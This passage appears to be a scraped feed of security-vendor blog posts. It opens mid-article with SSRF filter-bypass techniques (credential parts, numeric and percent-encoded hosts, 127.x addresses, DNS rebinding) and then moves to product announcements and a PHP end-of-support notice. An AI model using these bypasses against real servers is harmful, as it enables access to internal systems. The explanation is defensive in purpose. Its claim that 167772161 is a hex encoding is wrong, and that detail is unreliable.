    It's easy to assume that it will resolve to example.com. But as we've learned above, it is possible to add a credential part to the URL. This is achieved using an '@' symbol. One drawback of this method is that you can't use an unencoded slash character within the credential part. However, everything after 'http://' and before the '@' character can safely be ignored, since the browser will just remove it if no authentication is required. What we are left with is http://167772161/, which is actually just the hex encoded form of 10.0.0.1.

    The following URLs all resolve to http://example.com:

    • http://example.com/
    • http://%65xample.%63om/
    • http://%65%78%61%6d%70%6c%65%2e%63%6f%6d/

    Preventing Server Side Request Forgery is Harder Than You Think

    If you do not closely follow the specifications for URL parsing, filter bypasses can occur. Preventing SSRF vulnerabilities in particular is harder than you might think. You may want to block access to localhost and make it point to 127.0.0.1., as nothing stops an attacker from registering a domain like attacker.com. Just by blocking URLs with 127.0.0.1 as the domain is therefore not sufficient.

    And did you know that a URL like 127.123.123.123 points to localhost too? You should always make sure to retrieve the IP of the external service and take into consideration all possible bypasses. You should never use blacklisting, only whitelisting. Mistakes are bound to happen if you aren't aware of all the ways attackers can use to bypass your blacklist. If your code simply won't work without one, for example, if you want to retrieve data from a user supplied external URL, you should keep in mind that code like this is still vulnerable, even if you have a perfect blacklist that takes every possibility into consideration:

    host = 'attacker.com';
    ip  = getIpOf(host);
    if (isBlacklisted(ip) === false) {
    response = sendRequest(host);
    ...
    } else {
    throwError('forbidden URL detected');
    }

    While it may look like a secure way to prevent SSRF, it is still prone to DNS rebinding. sendRequest will most likely issue its own DNS request before it establishes a connection to the remote server. An attacker can send a harmless IP on the first DNS request, then the IP 127.0.0.1 on the second request. This is also known as a Time of Check to Time of Use (TOCTOU) problem.

    The moral of the story is that even if you parse the URL correctly, you still need to take care of pitfalls that arise with the use of its respective parts.

    Netsparker and GitLab Integration

    $
    0
    0

    We are pleased to announce a new function on Netsparker Enterprise, our scalable, multi-user, online web application security solution with built-in enterprise workflow and testing tools. From today, you will be able to integrate Netsparker Enterprise with GitLab, a web-based Git repository manager that provides CI/CD pipeline features.

    How the Integration of Netsparker with GitLab Works

    Gitlab enables you to add CI configuration to your source control repository using a single file.

    How the Integration of Netsparker with GitLab Works

    Gitlab uses .gitlab-ci.yml file in the project repository for the CI/CD pipeline features. Whenever changes are made to that repository, GitLab reads the .gitlab-ci.yml file and executes the commands within the gitlab runner's execution environment, in the order and with the settings described in the file.

    You can integrate Netsparker Enterprise with GitLab using cURL scripts. cURL is the defacto command-line tool for transferring data with URLs. Most of the Linux distributions already support cURL. Gitlab’s Linux runners already support it. And for the Gitlab’s Docker runners, it is very easy to add to their docker containers if it is not already installed. This is why we prefer to integrate Netsparker Enterprise with GitLab via cURL. It is very easy to use and accessible. Netsparker Enterprise uses the Integration Script Generator to generate cURL command-line tool scripts to integrate with GitLab. These scripts have been tested and approved for GitLab version 9+. In order to integrate with Netsparker Enterprise, GitLab Runner's execution environment must support cURL.

    Why the Integration of Netsparker with GitLab is Useful

    This new feature means you can generate cURL scripts with our Integration Script Generator. You can then use these cURL scripts to enable Netsparker Enterprise's advanced integration functionality.

    For further information, see Integrating Netsparker Enterprise with GitLab.

    Netsparker Announces New Application & Websites Discovery Service

    $
    0
    0

    Today, we announce a new Netsparker feature, the Netsparker Radar – Application & Service Discovery Service. This feature can both discover and catalog the websites or web applications that your business has online, including those you may have forgotten. This will help you ensure that you have better security coverage for all your web applications, services, and other online collateral.

    Why We Developed Discovered Websites

    Organizations may create lots of web applications and services, across the lifetime of their existence. The public-facing ones, on the web, are easy to remember. But those created long  ago, or those linked in the background, can easily get forgotten. This is why we developed the Discovered Websites feature, to ensure that as you work toward enhancing your security coverage, you don't leave out any crucial elements.

    Once Netsparker Radar becomes aware of all your connected applications and services, it then automatically  begins to scan them, to enable you to continue to remediate any security risks.

    How the Discovered Websites Feature Works

    A service called Netsparker Radar works independently from our Netsparker Enterprise product. It already has hundreds of millions of services on its database. It continually scans the entire internet to find websites that might belong to you.

    Netsparker Radar

    • All you have to do is register with Netsparker Enterprise for the discovery process to start. It begins with your commercial email and makes immediate suggestions. Then, once you start adding sites, the system will start analyzing your data and make relevant suggestions.
    • All users with Manage Websites permission can configure the Service Discovery Settings that determine how online resources are 'discovered'. The Discovered Websites feature uses parameters such as IP Address or IP Range, Second Level Domain, Top Level Domain and Organization Name. Your configuration and data are analyzed, and further suggested websites are added to the list.

    Service Discovery Settings

    • All discoveries are listed in a new Discovered Websites window. From this window, you can then select to add (Create) those discoveries to a list of websites to scan. Alternatively, you can also select to Exclude or Blacklist certain websites.

    This new feature enhances your capability, enabling you to conduct a comprehensive security audit and better secure your online presence, continually reducing web application vulnerability security threats.

    For further information, see Application and Service Discovery.

    The Proof-Based Scanning#TM# Technology in Netsparker Web Vulnerability Scanners

    $
    0
    0

    By automating most of the post-scan procedures with Netsparker's Proof-Based ScanningTM technology, you will have more time to fix the identified vulnerabilities and can leave the office on time.

    The Netsparker web application security scanners are the first and only scanners that automatically exploit the vulnerabilities they identify during a web vulnerability scan. This Proof-Based ScanningTM technology is what sets the Netsparker scanners apart from the competition, and what enables both scanners to generate dead accurate scan results.

    You can watch the video below for an introduction to the unique Proof-Based ScanningTM technology or read this document for a more detailed explanation of how this technology works and how it helps you automate most of the tedious and sometimes difficult post-scan task of verifying the identified vulnerabilities.

    If it is Exploitable, it is not a False Positive

    If a vulnerability can be exploited, it is not a false positive. That's definitely not arguable. The auto-exploitation technology is built on this concept; Netsparker finds a vulnerability and it automatically exploits it. By exploiting it, it confirms it is not a false positive. And when either Netsparker Desktop or the online web application security scanner Netsparker Cloud confirm a vulnerability, it will be marked as seen in the below screenshot.

    Automatically Generating a Proof of the Identified Web Vulnerability

    This is where it gets interesting; the Netsparker scanners do not just automatically exploit and confirm an identified vulnerability. They also prove that the vulnerability exists by generating either a Proof of Concept or a Proof of Exploit.

    Proof of Exploit vs Proof of Concept

    Netsparker scanners will either generate a proof of exploit or a proof of concept depending on the type of the identified vulnerability. Below is an explanation of what both are and for which vulnerabilities the Netsparker scanners will generate them.

    Proof of Concept

    A proof of concept is the actual exploit that can be used to prove that the vulnerability exists. For example in case of a cross-site scripting (XSS)vulnerability Netsparker will generate an HTML code snippet that when run it will exploit the identified XSS. A proof of concept can be used to demonstrate and reproduce the vulnerability to a developer, thus giving a quick insight about how the attacker can use and exploit this vulnerability.

    Below is a screenshot of a cross-site scripting vulnerability reported in Netsparker Cloud. Notice the Proof URL, in which Netsparker reports the URL that is used to exploit the identified vulnerability.

    Netsparker Cloud reports an identified XSS vulnerability, including the proof URL (PoC)

    Proof of Exploit

    A proof of exploit is used to report the data that can be extracted from the vulnerable target once the vulnerability is exploited, highlighting the impact an exploited vulnerability can have. For example in case the Netsparker scanners identify a SQL Injection vulnerability, they will extract data about the database and its setup as shown in the below screenshot.

    SQL Injection Proof of Exploit

    The Netsparker web vulnerability scanners can generate a proof of exploit when they identify any of the below vulnerability types:

     

    Benefits of Proof-Based ScanningTM Technology

    The benefits of automating the post-scan process with the Proof-Based ScanningTM technology are multifold. Just to mention a few:

    • You do not have to manually verify the vulnerabilities the scanners found, thus saving precious time that you can use to fix the reported security flaws instead.
    • You do not have to be a seasoned security professional to use any of the Netsparker security scanners. The results are automatically confirmed for you, so there is no need to know how to reproduce the findings.
    • You can assign the web application vulnerability scanning to less technical people and let the developers focus on what they do best; write code.
    • The process of finding vulnerabilities in web applications will cost you less since you can assign the scanning tasks to less technical people.
    • As a QA you won't be sent back by the developers to prove that there is a vulnerability in their code. Sounds familiar doesn't it?
    • As a developer or service provider you do not need to convince your superior or customer to fix their issues. Just show them the proof and they will surely give you the go ahead!

    Is Proof-Based ScanningTM Technology Safe?

    Yes, it is. The Netsparker web vulnerability scanners will only try to exploit a vulnerability in a safe and read only manner. For example, when exploiting a SQL injection vulnerability and generating a proof of exploit for it, they will only try to read data from the database and server. The scanners will not try to write or delete data from the database.

    End of Support for PHP 5 and PHP 7.0

    $
    0
    0

    At the end of 2018, PHP will stop releasing security updates and supporting PHP 5.6 as well as PHP 7.0. Considering there are millions of websites who are still running these old versions of the PHP framework, this move can put those millions of websites at risk. Some experts predict that flaws found in new and supported versions of PHP might be exploitable in the older versions too, but only 7.x will receive security updates.

    End of Support for PHP 5 and PHP 7.0

    Your main defense against such risks is to upgrade to a version higher than 7.0 before the end of year, such as PHP 7.3. To encourage users to upgrade website content management systems need to bump up their minimum requirements. Web hosts need to develop upgrade programs to help and encourage their users to upgrade.

    The biggest challenge to overcoming this problem is inertia from the big companies and developers who depend on PHP 5. For example, Wordpress still has support for PHP 5.2, which reached its end of life in 2011. Wordpress is used for more than a quarter of all sites on the internet. Companies fear the flood of support requests that come as a result of rolling out PHP version upgrades to a large number of sites.

    So make sure you update, and use systems that support the updated PHP versions. The risks of neglecting this are hacked sites, which could result in stolen user details, data breaches and massive fines of up to 4% of your turnover under GDPR legislation.

    Viewing all 1027 articles
    Browse latest View live